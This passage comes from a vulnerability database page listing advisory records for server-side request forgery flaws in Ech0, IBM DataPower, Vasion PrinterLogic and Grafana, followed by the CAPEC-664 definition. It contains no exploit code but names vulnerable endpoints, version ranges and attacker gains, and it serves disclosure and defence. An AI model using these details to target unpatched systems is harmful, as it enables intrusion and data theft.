**DOS(Denial of Service)**: reading the whole body into memory with io.ReadAll is a DoS vector if you point it at a massive file.\n\n\n## Remediation\n\n- Enforce **SSRF-safe URL policy**: allow only needed schemes/hosts; block link-local, metadata, and loopback unless explicitly required.\n- Remove **`InsecureSkipVerify`**; use normal TLS verification.\n- **Limit redirects** (disable or cap hops; re-validate each target).\n- Add **response size / timeout** limits; optionally restrict egress at the **network** layer.",
  "id": "GHSA-wc4h-2348-jc3p",
  "modified": "2026-04-06T23:41:04Z",
  "published": "2026-04-03T03:30:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lin-snow/Ech0/security/advisories/GHSA-wc4h-2348-jc3p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35036"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lin-snow/Ech0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ech0 has Unauthenticated Server-Side Request Forgery in Website Preview Feature"
}

GHSA-WC5H-762J-W3CX

Vulnerability from github – Published: 2022-08-02 00:00 – Updated: 2022-08-05 00:00
VLAI
Details

IBM DataPower Gateway 10.0.2.0 through 10.0.4.0, 10.0.1.0 through 10.0.1.8, 10.5.0.0, and 2018.4.1.0 through 2018.4.1.21 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 228433.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-31776"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-08-01T11:15:00Z",
    "severity": "HIGH"
  },
  "details": "IBM DataPower Gateway 10.0.2.0 through 10.0.4.0, 10.0.1.0 through 10.0.1.8, 10.5.0.0, and 2018.4.1.0 through 2018.4.1.21 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 228433.",
  "id": "GHSA-wc5h-762j-w3cx",
  "modified": "2022-08-05T00:00:24Z",
  "published": "2022-08-02T00:00:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31776"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/228433"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/6608604"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WC5M-7WGP-F4F3

Vulnerability from github – Published: 2025-09-29 21:30 – Updated: 2025-10-09 18:30
VLAI
Details

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.1.102 and Application prior to version 25.1.1413 (VA/SaaS deployments) contain a blind and non-blind server-side request forgery (SSRF) vulnerability. The '/var/www/app/console_release/hp/badgeSetup.php' script is reachable from the Internet without any authentication and builds URLs from user‑controlled parameters before invoking either the custom processCurl() function or PHP’s file_get_contents(); in both cases the hostname/URL is taken directly from the request with no whitelist, scheme restriction, IP‑range validation, or outbound‑network filtering. Consequently, any unauthenticated attacker can force the server to issue arbitrary HTTP requests to internal resources. This enables internal network reconnaissance, credential leakage, pivoting, and data exfiltration. This vulnerability has been confirmed to be remediated, but it is unclear as to when the patch was introduced.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-34231"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-29T21:15:36Z",
    "severity": "HIGH"
  },
  "details": "Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.1.102\u00a0and Application prior to version 25.1.1413\u00a0(VA/SaaS deployments) contain a blind and non-blind server-side request forgery (SSRF) vulnerability. The \u0027/var/www/app/console_release/hp/badgeSetup.php\u0027 script is reachable from the Internet without any authentication and builds URLs from user\u2011controlled parameters before invoking either the custom processCurl() function or PHP\u2019s file_get_contents(); in both cases the hostname/URL is taken directly from the request with no whitelist, scheme restriction, IP\u2011range validation, or outbound\u2011network filtering. Consequently, any unauthenticated attacker can force the server to issue arbitrary HTTP requests to internal resources. This enables internal network reconnaissance, credential leakage, pivoting, and data exfiltration.\u00a0This vulnerability has been confirmed to be remediated, but it is unclear as to when the patch was introduced.",
  "id": "GHSA-wc5m-7wgp-f4f3",
  "modified": "2025-10-09T18:30:27Z",
  "published": "2025-09-29T21:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34231"
    },
    {
      "type": "WEB",
      "url": "https://help.printerlogic.com/saas/Print/Security/Security-Bulletins.htm"
    },
    {
      "type": "WEB",
      "url": "https://help.printerlogic.com/va/Print/Security/Security-Bulletins.htm"
    },
    {
      "type": "WEB",
      "url": "https://pierrekim.github.io/blog/2025-04-08-vasion-printerlogic-83-vulnerabilities.html#va-ssrf-07"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/vasion-print-printerlogic-ssrf-via-hp-badgesetup-php-script"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-WC9W-WVQ2-FFM9

Vulnerability from github – Published: 2022-02-15 01:57 – Updated: 2023-10-02 14:34
VLAI
Summary
Server Side Request Forgery in Grafana
Details

The avatar feature in Grafana (github.com/grafana/grafana/pkg/api/avatar) 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue that allows remote code execution. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/grafana/grafana"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.1"
            },
            {
              "fixed": "6.7.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/grafana/grafana"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-13379"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-14T16:27:02Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "The avatar feature in Grafana (github.com/grafana/grafana/pkg/api/avatar) 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue that allows remote code execution. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on.",
  "id": "GHSA-wc9w-wvq2-ffm9",
  "modified": "2023-10-02T14:34:31Z",
  "published": "2022-02-15T01:57:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13379"
    },
    {
      "type": "WEB",
      "url": "https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/48638"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20200608-0006"
    },
    {
      "type": "WEB",
      "url": "https://rhynorater.github.io/CVE-2020-13379-Write-Up"
    },
    {
      "type": "WEB",
      "url": "https://mostwanted002.cf/post/grafanados"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O2KSCCGKNEENZN3DW7TSPFBBUZH3YZXZ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EEKSZ6GE4EDOFZ23NGYWOCMD6O4JF5SO"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rff71126fa7d9f572baafb9be44078ad409c85d2c0f3e26664f1ef5a2@%3Cdev.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/re7c4b251b52f49ba6ef752b829bca9565faaf93d03206b1db6644d31@%3Cdev.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/re75f59639f3bc1d14c7ab362bc4485ade84f3c6a3c1a03200c20fe13@%3Cissues.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rd0fd283e3844b9c54cd5ecc92d966f96d3f4318815bbf3ac41f9c820@%3Ccommits.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rba0247a27be78bd14046724098462d058a9969400a82344b3007cf90@%3Cdev.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rad99b06d7360a5cf6e394afb313f8901dcd4cb777aee9c9197b3b23d@%3Cdev.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r984c3b42a500f5a6a89fbee436b9432fada5dc27ebab04910aafe4da@%3Cissues.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r6bb57124a21bb638f552d81650c66684e70fc1ff9f40b6a8840171cd@%3Cissues.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r6670a6c29044bcb77d4e5d165b5bd13fffe37b84caa5d6471b13b3a2@%3Cdev.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r40f0a97b6765de6b8938bc212ee9dfb5101e9efa48bcbbdec02b2a60@%3Cissues.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r093b405a49fd31efa0d949ac1a887101af1ca95652a66094194ed933@%3Cdev.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r0928ee574281f8b6156e0a6d0291bfc27100a9dd3f9b0177ece24ae4@%3Cdev.ambari.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://grafana.com/blog/2020/06/03/grafana-6.7.4-and-7.0.2-released-with-important-security-fix"
    },
    {
      "type": "WEB",
      "url": "https://community.grafana.com/t/release-notes-v7-0-x/29381"
    },
    {
      "type": "WEB",
      "url": "https://community.grafana.com/t/release-notes-v6-7-x/27119"
    },
    {
      "type": "WEB",
      "url": "https://community.grafana.com/t/grafana-7-0-2-and-6-7-4-security-update/31408"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00083.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00009.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00017.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/158320/Grafana-7.0.1-Denial-Of-Service.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2020/06/03/4"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2020/06/09/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N/E:F/RL:O/RC:C",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Server Side Request Forgery in Grafana"
}

No mitigation information available for this CWE.

CAPEC-664: Server Side Request Forgery

An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.